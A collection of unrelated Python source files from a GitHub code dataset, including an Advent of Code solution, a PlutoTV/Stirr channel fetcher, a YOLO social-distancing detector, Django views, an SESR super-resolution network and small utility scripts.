self.tree_map.get_tree(tree_left.left_obstacle.coord, self.y)\n return Obstacle(tree_left.height, tree_left.x)\n\n @property\n def is_visible(self) -> bool:\n return any(\n obstacle.height == self.tree_map.OUTSIDE_HEIGHT\n for obstacle in (self.upper_obstacle, self.right_obstacle, self.lower_obstacle, self.left_obstacle)\n )\n\n def get_scenic_score(self) -> int:\n return (\n (self.y - max(0, self.upper_obstacle.coord))\n * (min(self.tree_map.size - 1, self.right_obstacle.coord) - self.x)\n * (min(self.tree_map.size - 1, self.lower_obstacle.coord) - self.y)\n * (self.x - max(0, self.left_obstacle.coord))\n )\n\n return _Tree(height, x, y)\n\n\ndef load_data(path: Union[str, bytes, os.PathLike]) -> List[List[int]]:\n with open(path) as fd:\n return [[int(value) for value in row.strip()] for row in fd]\n\n\ndef part_one(data: List[List[int]]) -> int:\n tree_map = TreeMap(data)\n return sum([tree.is_visible for row in tree_map.trees for tree in row])\n\n\ndef part_two(data: List[List[int]]) -> int:\n tree_map = TreeMap(data)\n return max(tree.get_scenic_score() for row in tree_map.trees for tree in row)\n\n\nif __name__ == \"__main__\":\n input_dir = Path().resolve().parent / \"inputs/08\"\n samples = load_data(input_dir / \"samples.in\")\n data = load_data(input_dir / \"data.in\")\n\n assert part_one(samples) == 21\n assert part_two(samples) == 8\n\n print(part_one(data))\n print(part_two(data))\n","repo_name":"koczanm/advent-of-code","sub_path":"2022/python/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41161014864","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n################################### modified by aime_jeux ##################################\r\n############# Aout 2021 #############\r\n############################################################################################\r\nimport warnings\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nwarnings.simplefilter('ignore',InsecureRequestWarning)\r\n########################################################################\r\nimport requests,re,json,time,hashlib,sys\r\nSt = requests.Session()\r\nfrom time import 
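day8.py above resolves each tree's view by hopping between memoized "obstacle" positions. A brute-force scenic score that scans each direction linearly is a useful cross-check for that caching logic (the helper name below is mine; the grid is the puzzle's published sample):

def scenic_score(grid, x, y):
    height, size = grid[y][x], len(grid)
    score = 1
    for dx, dy in ((0, -1), (1, 0), (0, 1), (-1, 0)):  # up, right, down, left
        seen, cx, cy = 0, x + dx, y + dy
        while 0 <= cx < size and 0 <= cy < size:
            seen += 1
            if grid[cy][cx] >= height:  # view blocked by an equal/taller tree
                break
            cx, cy = cx + dx, cy + dy
        score *= seen
    return score

sample = [[3,0,3,7,3],[2,5,5,1,2],[6,5,3,3,2],[3,3,5,4,9],[3,5,3,9,0]]
print(max(scenic_score(sample, x, y) for y in range(5) for x in range(5)))  # 8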
ctime\r\n########################################################################\r\nBASE_API = \"https://i.mjh.nz/PlutoTV/app.json\"#\"https://raw.githubusercontent.com/matthuisman/i.mjh.nz/master/PlutoTV/app.json\"#\r\nBASE_Stirr = \"https://i.mjh.nz/Stirr/app.json\"#\"https://raw.githubusercontent.com/matthuisman/i.mjh.nz/master/Stirr/app.json\"#\r\n##############################################\r\ndef buildHeader_Pluto_Second():\r\n header_dict = {}\r\n header_dict[\"Host\"] = \"i.mjh.nz\"#\"raw.githubusercontent.com\"#\"i.mjh.nz\"\r\n header_dict[\"User-Agent\"] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\"\r\n header_dict[\"Accept\"] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\"\r\n header_dict[\"Accept-Language\"] = \"fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\"\r\n header_dict[\"Accept-Encoding\"] = \"gzip, deflate\"\r\n #header_dict[\"Alt-Used\"] = \"i.mjh.nz\"\r\n header_dict[\"Connection\"] = \"keep-alive\"\r\n return header_dict\r\n##############################################\r\nfrom Plugins.Extensions.SupTVoDNeW.OutilsSup.Sptvnw.Config import show_listprogramme,show_Menu_PlutoTv_Stirr\r\n##############################################\r\nclass ImportData():\r\n def __init__(self):\r\n self.Loading = 'Loading ...... List Live TV %s.. ' % 'Please wait'\r\n self.listvodmenu = {}\r\n self.chapters = {}\r\n self.menu = []\r\n self._list = []\r\n self.list_seasons = []\r\n self.menu_ = []\r\n self.Aze = ''\r\n self.Zer = ''\r\n def getURL_Pluto_Second(self,url,header):\r\n try:\r\n req = requests.get(url,headers=header,verify=False)\r\n req.raise_for_status()\r\n return True,req.json()\r\n except Exception:\r\n return False,{}\r\n def getChannels_Pluto(self):\r\n headers = buildHeader_Pluto_Second()\r\n a,self.listvodmenu = self.getURL_Pluto_Second(BASE_API, headers)\r\n if a:return True,self.listvodmenu\r\n else:return False,self.listvodmenu\r\n def Programmes_Pluto(self,_Ttl,listos,prox,sid):\r\n self.listprogramme = []\r\n self._dons = ''\r\n self.Aze = listos['regions'][prox]['channels'][str(sid)]\r\n self.Zer = self.Aze['programs']\r\n self.lenlist = len(self.Zer)\r\n i = 1\r\n self.listprogramme.append(show_listprogramme('',_Ttl,'premier'))\r\n self.listprogramme.append(show_listprogramme('Program','Time','second'))\r\n for items in self.Zer:\r\n Titles = items[1].encode('utf-8')\r\n timep = items[0]\r\n Tme_ = ctime(timep)\r\n self._dons += Titles+' : '+str(Tme_)+'\\n'\r\n self.listprogramme.append(show_listprogramme(str(i),Titles,Tme_))\r\n i = i + 1\r\n return str(self._dons),self.listprogramme\r\n def getChannels_Pluto_Stirr(self):\r\n self.myfinalist = []\r\n self.List_MoviePlayer_1 = []\r\n headers = buildHeader_Pluto_Second()\r\n a,self.listvodmenu = self.getURL_Pluto_Second(BASE_Stirr, headers)\r\n if a:\r\n i = 1\r\n for keys in self.listvodmenu['channels'].keys():\r\n name = self.listvodmenu['channels'][keys].get('name','').encode('utf-8')#\r\n description = self.listvodmenu['channels'][keys].get('description','')#\r\n logo = self.listvodmenu['channels'][keys].get('logo','')#\r\n url = self.listvodmenu['channels'][keys].get('url','')#\r\n groups = self.listvodmenu['channels'][keys].get('groups','')#\r\n programs = self.listvodmenu['channels'][keys].get('programs','')\r\n self.myfinalist.append(show_Menu_PlutoTv_Stirr(str(i)+'. 
'+name,url,logo,groups,description,programs))\r\n self.List_MoviePlayer_1.append(('',name,name +' .......','',url,'','',logo,'',''))\r\n i = i + 1\r\n return True,self.myfinalist,self.List_MoviePlayer_1\r\n else:return False,self.listvodmenu,self.List_MoviePlayer_1","repo_name":"aimejeux/suptvodnew","sub_path":"OutilsSup/PlutoTvSecond/ImportData.py","file_name":"ImportData.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"779660228","text":"# program to compute SD in images\nimport numpy as np\nimport argparse\nimport time\nimport cv2\nimport math\n\n# argument parser\narg = argparse.ArgumentParser()\narg.add_argument(\"--image\", required=True, help=\"path to input image\")\narg.add_argument(\"-d\", \"--distance\", type=float, default=100.0, help=\"pixels distance to calculate social distance\")\nargs = vars(arg.parse_args())\n\nlabelsPath = \"./coco.names\"\nLABELS = open(labelsPath).read().strip().split(\"\\n\")\nnp.random.seed(42)\nCOLORS = np.random.randint(0, 255, size=(len(LABELS), 3),\n dtype=\"uint8\")\nweightsPath = \"./yolo-coco/yolov3.weights\"\nconfigPath = \"./yolo-coco/yolov3.cfg\"\n\nnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\n\nimage = cv2.imread(args[\"image\"])\n(H, W) = image.shape[:2]\nln = net.getLayerNames()\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\nblob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416), swapRB=True, crop=False)\nnet.setInput(blob)\nstart = time.time()\nlayerOutputs = net.forward(ln)\nend = time.time()\nprint(\"Frame Prediction Time : {:.6f} seconds\".format(end - start))\nboxes = []\nconfidences = []\nclassIDs = []\nfor output in layerOutputs:\n for detection in output:\n scores = detection[5:]\n classID = np.argmax(scores)\n confidence = scores[classID]\n if confidence > 0.5 and classID == 0:\n box = detection[0:4] * np.array([W, H, W, H])\n (centerX, centerY, width, height) = box.astype(\"int\")\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n classIDs.append(classID)\n\nidxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)\nind = []\nfor i in range(0, len(classIDs)):\n if (classIDs[i] == 0):\n ind.append(i)\na = []\nb = []\ncolor = (0, 255, 0)\nif len(idxs) > 0:\n for i in idxs.flatten():\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n a.append(x)\n b.append(y)\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n\ndistance = []\nnsd = []\nfor i in range(0, len(a) - 1):\n for k in range(1, len(a)):\n if (k == i):\n break\n else:\n x_dist = (a[k] - a[i])\n y_dist = (b[k] - b[i])\n d = math.sqrt(x_dist * x_dist + y_dist * y_dist)\n distance.append(d)\n if (d <= args[\"distance\"]):\n nsd.append(i)\n nsd.append(k)\n nsd = list(dict.fromkeys(nsd))\n\ncolor = (0, 0, 255)\nfor i in nsd:\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n text = \"Alert\"\n cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\ncv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\ncv2.imshow(\"Image\", image)\ncv2.imwrite('./output_sd.jpg', 
image)\ncv2.waitKey()\n","repo_name":"RakeshRaj97/covid-19-face-mask-and-social-distancing-detection","sub_path":"detect_social_distance_image.py","file_name":"detect_social_distance_image.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"33383821301","text":"def is_a_first(a, b, names):\n\n def divide_name(name):\n i = 0\n head = num = tail = ''\n\n while not name[i].isnumeric():\n head += name[i]\n i += 1\n\n while name[i:i+1].isnumeric() and len(num) != 5:\n num += name[i]\n i += 1\n\n tail = name[i:]\n return head, num, tail\n\n a_parts = divide_name(a)\n b_parts = divide_name(b)\n\n # head\n if a_parts[0].upper() < b_parts[0].upper():\n return True\n elif a_parts[0].upper() > b_parts[0].upper():\n return False\n\n # num\n if int(a_parts[1]) < int(b_parts[1]):\n return True\n elif int(a_parts[1]) > int(b_parts[1]):\n return False\n\n # original order\n return names.index(a) < names.index(b)\n\n\ndef filename_merge(arr):\n arr_copy = arr.copy()\n\n def divide(lo, hi):\n if lo == hi:\n return arr_copy[lo]\n\n mid = (lo + hi) // 2\n divide(lo, mid)\n divide(mid+1, hi)\n\n merge(lo, mid, hi)\n\n def merge(lo, mid, hi):\n left = lo\n right = mid + 1\n tmp = []\n\n while left <= mid or right <= hi:\n if left <= mid and (right > hi or is_a_first(arr_copy[left], arr_copy[right], arr)):\n tmp.append(arr_copy[left])\n left += 1\n else:\n tmp.append(arr_copy[right])\n right += 1\n\n arr_copy[lo:hi+1] = tmp\n\n divide(0, len(arr_copy)-1)\n return arr_copy\n\n\nif __name__ == '__main__':\n test = ['img12.png', 'img10.png', 'img02.png', 'img1.png', 'IMG01.GIF', 'img2.JPG']\n print(test, '\\n', filename_merge(test))\n\n print('\\n' + '-' * 30 + '\\n')\n\n test = ['F-5 Freedom Fighter', 'B-50 Superfortress', 'A-10 Thunderbolt II', 'F-14 Tomcat']\n print(test, '\\n', filename_merge(test))\n","repo_name":"shoark7/algorithm-with-python","sub_path":"problems_solving/kakao/filename_merge.py","file_name":"filename_merge.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"2817181895","text":"from tkinter import *\n\ndef choice():\n\n if(radio.get()==1):\n root.configure(background='red')\n elif(radio.get()==2):\n root.configure(background='blue')\n elif(radio.get()==3):\n root.configure(background='green')\n\nroot= Tk()\nroot.geometry(\"1000x1000\")\nradio=IntVar()\nrb1=Radiobutton(root,text='Red', variable=radio,width=50,value=1, command=choice)\nrb1.grid(row=0)\nrb2=Radiobutton(root,text='Blue', variable=radio,width=50,value=2, command=choice)\nrb2.grid(row=1)\nrb3=Radiobutton(root,text='Green', variable=radio,width=50,value=3, command=choice)\nrb3.grid(row=3)\nroot.mainloop()","repo_name":"PensPencil/Codes","sub_path":"Python Codes/tkinter/INTRODUCTION/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8160689248","text":"from pathlib import Path\n\nfrom app.videos.shemas import AudioStream\nfrom app.config import CHUNK_SIZE, AUDIOS_DIR\n\n\ndef get_audio_stream(\n video_id: str, start: int = 0, end: int | None = None) -> AudioStream:\n if not end:\n end = start + CHUNK_SIZE\n path = AUDIOS_DIR / video_id\n data = _read_audio_bytes(path, start, end)\n filesize = path.stat().st_size\n return AudioStream(start=start, end=end, data=data, filesize=filesize)\n\n\ndef 
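The social-distancing script above compares detections with nested loops, `math.sqrt`, and easy-to-misread loop bounds. The same proximity test with NumPy broadcasting touches each pair exactly once (`threshold` and the coordinates below are illustrative):

import numpy as np

centers = np.array([[10, 20], [15, 24], [200, 50], [205, 52]], dtype=float)
threshold = 6.0

# Pairwise Euclidean distances via broadcasting: (n, 1, 2) - (1, n, 2) -> (n, n).
diff = centers[:, None, :] - centers[None, :, :]
dist = np.sqrt((diff ** 2).sum(axis=-1))

# Upper triangle only, so each pair is tested once and i != j.
i_idx, j_idx = np.triu_indices(len(centers), k=1)
too_close = dist[i_idx, j_idx] <= threshold
violators = set(i_idx[too_close]) | set(j_idx[too_close])
print(sorted(violators))  # [2, 3]: the boxes that should be drawn in red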
_read_audio_bytes(path: Path, start, end: int) -> bytes:\n with open(path, 'rb') as video:\n video.seek(start)\n return video.read(end - start)\n\n","repo_name":"n1ktrnv/audioplayer","sub_path":"app/videos/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27465597990","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom listings.models import Listing\nfrom realtors.models import Realtor\nfrom listings.choices import price_choices, bedroom_choices, state_choices\n\n\ndef index(request):\n \"\"\"This main view for the website. It also shows up to 3 of the featured listings.\n\n Args:\n request:The HTTP request\n Returns:\n render: call to render with the request and URL\n \"\"\"\n listings = Listing.objects.order_by('-list_date').filter(is_published=True)[:3]\n # a dictionary can be used as an argument to pass information to the template or html page dynamically.\n context = {\n 'listings': listings,\n 'state_choices': state_choices,\n 'price_choices': price_choices,\n 'bedroom_choices': bedroom_choices,\n }\n # Pass in the context that contains the listing objects\n return render(request, 'pages/index.html', context)\n\n\ndef about(request):\n \"\"\"The about page for the BT Realty site. This view shows a list of all realtors and has a separate query and\n context object for the mvp/seller of the month.\n\n Args:\n request:The HTTP request\n Returns:\n render: call to render with the request and URL\n \"\"\"\n realtors = Realtor.objects.order_by('-hire_date')\n\n # get the seller of the month -> is_mvp = True\n mvp_realtors = Realtor.objects.all().filter(is_mvp=True)\n\n context = {\n 'realtors': realtors,\n 'mvp_realtors': mvp_realtors,\n }\n return render(request, 'pages/about.html', context)\n\n","repo_name":"DavidHartman-Personal/btre_project","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27439521170","text":"import torch\nimport sys \nimport mlsr_training.sesr_common as common\nimport copy\nimport numpy as np\nimport torch.nn as nn\nfrom collections import OrderedDict\n# from .convolution import reset_state, detach_state\n# def make_model(args, parent=False):\n# return SESR(args)\n\ndef Conv(in_channels, out_channels, kernel_size, stride, padding, groups=1):\n conv_seq = nn.Sequential()\n conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels,\n kernel_size=kernel_size, stride=stride, padding=padding, groups=groups, bias=False)\n conv_seq.add_module('conv', conv)\n # conv_seq.add_module('bn', nn.BatchNorm2d(out_channels))\n return conv_seq\n\n## Residual Block (RCAB)\nclass RCAB(nn.Module):\n def __init__(\n self, conv, n_feat, kernel_size, reduction,\n res_scale=1, deploy=False):\n\n super(RCAB, self).__init__()\n self.in_channels = n_feat\n self.groups = 1\n self.res_scale = res_scale\n self.deploy = deploy\n self.se = nn.Identity() \n r = 16\n \n if deploy:\n self.body_reparam = nn.Conv2d(in_channels=n_feat, out_channels=n_feat, kernel_size=kernel_size, stride=1,\n padding=1, dilation=1, groups=1, bias=False)\n \n else:\n self.body_identity = None\n \n self.body_dense = Conv(n_feat, r*n_feat, kernel_size, 1, 1, 1)\n self.body_dense_1x1 = Conv(r*n_feat, n_feat, 1, 1, 0, 1)\n self.body_1x1 = Conv(n_feat, n_feat, 1, 1, 0, 1)\n #print('Rep Block, 
identity = ', self.body_identity)\n\n def forward(self, x):\n if hasattr(self, 'body_reparam'):\n return self.body_reparam(x)\n else:\n if self.body_identity is None:\n id_out = 0\n else: \n id_out = self.body_identity(x)\n y = self.body_dense(x)\n y = self.body_dense_1x1(y)\n return y + self.body_1x1(x) + id_out\n \n def get_equivalent_kernel_bias(self):\n kernel3x3, bias3x3 = self._fuse_tensor(self.body_dense)\n kernel1x1, bias1x1 = self._fuse_tensor(self.body_1x1)\n kernelid, biasid = self._fuse_tensor(self.body_identity)\n return kernel3x3 + self._pad_1x1_to_3x3_tensor(kernel1x1) + kernelid, None#bias3x3 + bias1x1 + biasid\n\n def _pad_1x1_to_3x3_tensor(self, kernel1x1):\n if kernel1x1 is None:\n return 0\n else:\n return torch.nn.functional.pad(kernel1x1, [1,1,1,1])\n\n\n def _fuse_tensor(self, branch):\n \n if branch is None:\n return 0, 0\n if isinstance(branch, nn.Sequential):\n kernel = branch.conv.weight \n else:\n assert isinstance(branch, nn.BatchNorm2d)\n if not hasattr(self, 'id_tensor'):\n input_dim = self.in_channels // self.groups\n kernel_value = np.zeros((self.in_channels, input_dim, 3, 3), dtype=np.float32)\n \n for i in range(self.in_channels):\n kernel_value[i, i % input_dim, 1, 1] = 1\n self.id_tensor = torch.from_numpy(kernel_value)\n kernel = self.id_tensor\n return kernel, None \n\n def switch_to_deploy(self):\n if hasattr(self, 'body_reparam'):\n return\n kernel, bias = self.get_equivalent_kernel_bias()\n self.body_reparam = nn.Conv2d(in_channels=self.body_dense.conv.in_channels, out_channels=self.body_dense.conv.out_channels,\n kernel_size=self.body_dense.conv.kernel_size, stride=self.body_dense.conv.stride,\n padding=self.body_dense.conv.padding, dilation=self.body_dense.conv.dilation, groups=self.body_dense.conv.groups, bias=False)\n\n self.body_reparam.weight.data = kernel\n for para in self.parameters():\n para.detach_()\n self.__delattr__('body_dense')\n self.__delattr__('body_1x1')\n if hasattr(self, 'body_identity'):\n self.__delattr__('body_identity')\n\n## RonvGroup\nclass ConvGroup(nn.Module):\n def __init__(\n self, conv, in_feat, mid_feat, out_feat, kernel_size, deploy=False):\n\n super(ConvGroup, self).__init__()\n self.deploy = deploy\n \n if deploy:\n self.body_reparam = nn.Conv2d(in_channels=in_feat, out_channels=out_feat, kernel_size=kernel_size, stride=1,\n padding=(kernel_size - 1) // 2, dilation=1, groups=1, bias=False)\n else:\n self.body_dense = Conv(in_feat, mid_feat, kernel_size, 1, (kernel_size - 1) // 2, 1)\n self.body_1x1 = Conv(mid_feat, out_feat, 1, 1, 0, 1)\n \n def forward(self, x):\n if hasattr(self, 'body_reparam'):\n return self.body_reparam(x)\n else:\n x = self.body_dense(x)\n x = self.body_1x1(x) \n return x\n\n def merge_tensor(self):\n kernel5x5 = self.body_dense.conv.weight\n kernel1x1 = self.body_1x1.conv.weight\n return torch.conv2d(kernel5x5.permute(1, 0, 2, 3), kernel1x1.flip(-1, -2), padding=0).permute(1, 0, 2, 3)\n\n def switch_to_deploy(self):\n if hasattr(self, 'body_reparam'):\n return\n kernel = self.merge_tensor()\n self.body_reparam = nn.Conv2d(in_channels=self.body_dense.conv.in_channels, out_channels=self.body_1x1.conv.out_channels,\n kernel_size=self.body_dense.conv.kernel_size, stride=self.body_dense.conv.stride,\n padding=self.body_dense.conv.padding, dilation=self.body_dense.conv.dilation, groups=self.body_dense.conv.groups, bias=False)\n\n self.body_reparam.weight.data = kernel\n for para in self.parameters():\n para.detach_()\n self.__delattr__('body_dense')\n self.__delattr__('body_1x1')\n \nclass 
ResidualGroup(nn.Module):\n def __init__(self, conv, n_feat, kernel_size, reduction, res_scale, n_resblocks, deploy):\n super(ResidualGroup, self).__init__()\n self.deploy = deploy \n modules_body = []\n modules_body = [\n RCAB(\n conv, n_feat, kernel_size, reduction, res_scale=1, deploy=self.deploy) \\\n for _ in range(n_resblocks)]\n self.body = nn.Sequential(*modules_body)\n self.act = nn.ReLU()\n\n def forward(self, x):\n res = self.body(x)\n res += x\n return self.act(res)\n\nclass SESR(nn.Module):\n def __init__(self, in_channels:int, return_outs:bool, gen_cfg=None, scale:int=2, conv=common.default_conv):\n super(SESR, self).__init__()\n \n # n_resgroups = 11\n # n_resblocks = 1\n # n_feats = 16\n # kernel_size = 3\n # reduction = 16\n # scale = 1\n # act = nn.PReLU()\n # deploy = False\n # res_scale = 1\n # self.deploy = deploy \n\n n_resgroups = 7\n n_resblocks = 1\n n_feats = 16\n kernel_size = 3\n reduction = 16\n scale = 1\n act = nn.PReLU()\n deploy = False\n res_scale = 1\n self.deploy = deploy \n\n # define head module\n self.head = ConvGroup(conv, in_feat=15, mid_feat=256, out_feat=n_feats, kernel_size=5, deploy=deploy)\n \n # define body module\n modules_body = [\n ResidualGroup(\n conv, n_feats, kernel_size, reduction, res_scale=res_scale, n_resblocks=n_resblocks, deploy=deploy) \\\n for _ in range(n_resgroups)]\n\n self.body = nn.Sequential(*modules_body)\n \n # define tail module\n self.tail = ConvGroup(conv, in_feat=n_feats, mid_feat=256, out_feat=scale*scale*16, kernel_size=5, deploy=deploy)\n\n def forward(self, x): \n x = self.head(x)\n res = self.body(x)\n res = res + x\n res = self.tail(res)\n return res \n\n def reset(self):\n self.head.reset()\n for m in self.body:\n m.reset()\n self.tail.reset()\n \n def detach(self):\n self.head.detach()\n for m in self.body:\n m.detach()\n self.tail.detach()\n\n def load_state_dict(self, state_dict, strict=False):\n own_state = self.state_dict()\n for name, param in state_dict.items():\n if name in own_state:\n if isinstance(param, nn.Parameter):\n param = param.data\n try:\n own_state[name].copy_(param)\n except Exception:\n if name.find('tail') >= 0:\n print('Replace pre-trained upsampler to new one...')\n else:\n raise RuntimeError('While copying the parameter named {}, '\n 'whose dimensions in the model are {} and '\n 'whose dimensions in the checkpoint are {}.'\n .format(name, own_state[name].size(), param.size()))\n elif strict:\n if name.find('tail') == -1:\n raise KeyError('unexpected key \"{}\" in state_dict'\n .format(name))\n\n if strict:\n missing = set(own_state.keys()) - set(state_dict.keys())\n if len(missing) > 0:\n raise KeyError('missing keys in state_dict: \"{}\"'.format(missing))\n\n\ndef model_convert(model:torch.nn.Module, save_path=None, do_copy=True):\n if do_copy:\n model = copy.deepcopy(model)\n for module in model.modules():\n if hasattr(module, 'switch_to_deploy'):\n module.switch_to_deploy()\n if save_path is not None:\n torch.save(model.state_dict(), save_path)\n print('Save converted model in: ', save_path)\n return model\n","repo_name":"wanglixilinx/CDCL","sub_path":"sesr.py","file_name":"sesr.py","file_ext":"py","file_size_in_byte":9898,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"27052707200","text":"import logging\n\nfrom dq0.sdk.errors.errors import fatal_error\nfrom dq0.sdk.utils.managed_classes import custom_objects\n\nimport yaml\n\nlogger = logging.getLogger()\n\n\nclass YamlConfig():\n \"\"\"Yaml parser for tf.keras 
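sesr.py above folds its dense 3x3, 1x1, and identity branches into one `body_reparam` convolution at deploy time. The fusion rests on convolution being linear in the kernel; a quick standalone check of the pad-and-add step (generic PyTorch, not the record's classes):

import torch
import torch.nn.functional as F

torch.manual_seed(0)
x = torch.randn(1, 8, 16, 16)
k3 = torch.randn(8, 8, 3, 3)   # 3x3 branch weight
k1 = torch.randn(8, 8, 1, 1)   # 1x1 branch weight

# Two-branch forward pass (padded so spatial size is preserved).
y_branches = F.conv2d(x, k3, padding=1) + F.conv2d(x, k1, padding=0)

# Fused: pad the 1x1 kernel to 3x3 and add, as get_equivalent_kernel_bias does.
k_fused = k3 + F.pad(k1, [1, 1, 1, 1])
y_fused = F.conv2d(x, k_fused, padding=1)

print(torch.allclose(y_branches, y_fused, atol=1e-5))  # True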
models\n\n Yaml parser class for tf.Keras config files.\n \"\"\"\n\n def __init__(self,\n yaml_path,\n yaml_dict=None,\n custom_objects=custom_objects):\n self.yaml_str = None\n self.yaml_path = yaml_path\n self.custom_objects = custom_objects\n if yaml_dict is None:\n self.read_yaml_file()\n else:\n self.yaml_dict = yaml_dict\n\n def read_yaml_file(self):\n \"\"\"Reads yaml file\n\n This function parses a yaml file to self.yaml_dict\n \"\"\"\n try:\n with open(self.yaml_path, 'r') as yaml_file:\n self.yaml_dict = yaml.load(yaml_file, Loader=yaml.Loader) # turnsout SafeLoader doesnt recognise !!python/tuple\n except Exception as e:\n fatal_error('Could not find config at {}! {}'.format(\n self.yaml_path, e), logger=logger)\n return self.yaml_dict\n\n def save_yaml(self):\n \"\"\"Save yaml dict to a yaml file\"\"\"\n try:\n with open(self.yaml_path, 'w') as yaml_file:\n yaml_file.write(self.yaml_dict)\n except Exception as e:\n fatal_error('Cannot write yaml to {}! {}'.format(\n self.yaml_path, e), logger=logger)\n\n def dump_yaml(self, yaml_dict):\n self.yaml_str = yaml.dump(yaml_dict)\n return self.yaml_str\n","repo_name":"gradientzero/dq0-sdk","sub_path":"dq0/sdk/utils/yaml_config.py","file_name":"yaml_config.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1709768076","text":"#! python 3\n#! utf-8\n\nimport getpass\nimport re\nimport requests\nimport sys\n\nfrom bs4 import BeautifulSoup\nfrom helper_functions import *\n\nif __name__ == \"__main__\":\n # check if timetable.json exist\n doTimetableExist()\n # get argument from terminal\n param = sys.argv[1:] # this decides what the program will do\n if (len(param) == 0):\n print('Usage: python main.py .')\n print(\"\"\"\n Features currently available:\n 1. Automatic Attendance \n 2. Automatic Attendance (Replacement Class) \n 3. 
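yaml_config.py above falls back to the permissive `yaml.Loader` because `SafeLoader` rejects `!!python/tuple` tags. A narrower option is to keep `SafeLoader` and register only the tuple constructor, which avoids enabling arbitrary object construction (a sketch of the alternative, not dq0-sdk behavior):

import yaml

class TupleSafeLoader(yaml.SafeLoader):
    """SafeLoader that additionally understands !!python/tuple."""

def construct_python_tuple(loader, node):
    # Build a plain tuple from the YAML sequence node.
    return tuple(loader.construct_sequence(node))

TupleSafeLoader.add_constructor(
    "tag:yaml.org,2002:python/tuple", construct_python_tuple)

doc = "shape: !!python/tuple [3, 224, 224]"
print(yaml.load(doc, Loader=TupleSafeLoader))  # {'shape': (3, 224, 224)}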
Search for a Subject \n \"\"\")\n else:\n if (param[0] == 'attend'):\n if ('replace' in param[1:]):\n attend(replace=True)\n else:\n attend()\n\n elif (param[0] == 'search'):\n if (len(param[1:]) == 0):\n print('Usage: python main.py search .')\n\n if len(param[1:]) > 1:\n\n for course in param[1:]:\n content = search(course)\n print(f\"Search : {course}\")\n\n for (index, result) in enumerate(content, start=1):\n print(f\"{index} : {result}\")\n print()\n\n for course in param[1:]:\n option = input(f\"Enter n if your course is not here!\\nChoose one of the courses ({course}):\")\n if(option == 'n'):\n retry = input(f\"Search {course}: \")\n content = search(retry)\n\n for (index, result) in enumerate(content, start=1):\n print(f\"{index} : {result}\")\n print()\n else:\n course_id = list(content.values())[int(option)-1]\n course_fullName = list(content.keys())[int(option)-1]\n\n register(course_fullName, course_id)\n\n else:\n content = search(param[1])\n\n # Receive possible search results\n if len(content) > 1:\n for (index, result) in enumerate(content, start=1):\n print(f\"{index} : {result}\")\n print()\n\n option = input(\"Enter n if your course is not here!\\nChoose one of the courses : \")\n\n if(option == 'n'):\n retry = input(\"Search : \")\n content = search(retry)\n\n for (index, result) in enumerate(content, start=1):\n print(f\"{index} : {result}\")\n print()\n\n else :\n course_id = list(content.values())[int(option)-1]\n course_fullName = list(content.keys())[int(option)-1]\n\n register(course_fullName, course_id)\n\n else:\n print(\"That feature is currently not available.\\nPlease try it again.\")\n","repo_name":"kuanyi-ng/Auto-Moodle-Attendance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24918598435","text":"from hdf5io import *\nfrom numpy import array \n\ndef testsavetypes():\n \"\"\" Test saveing supported variable types \"\"\"\n varint = 1\n varfloat = 3.14159\n varstring=\"test string\"\n varcomplex=(1-4j)\n varlist=[1, 32, 3]\n varlists=[1, 32, 'test string']\n vartuple = (1, 2, 3)\n vartuples = (1, 2, 'test string')\n vararray = array([1,2,3])\n #vararrays = array([(1,2,3,'a'), (2,3,5,'b')])\n vararrayc = array( [ [1,2], [3,4] ], dtype=complex )\n\n # Save to file\n hdf5save(\"test.h5\")\n return locals()\n\ndef showfile():\n \"\"\"\" Show file content \"\"\" \n hdf5ls(\"test.h5\")\n\ndef testappend(): \n \"\"\" Test to append variable 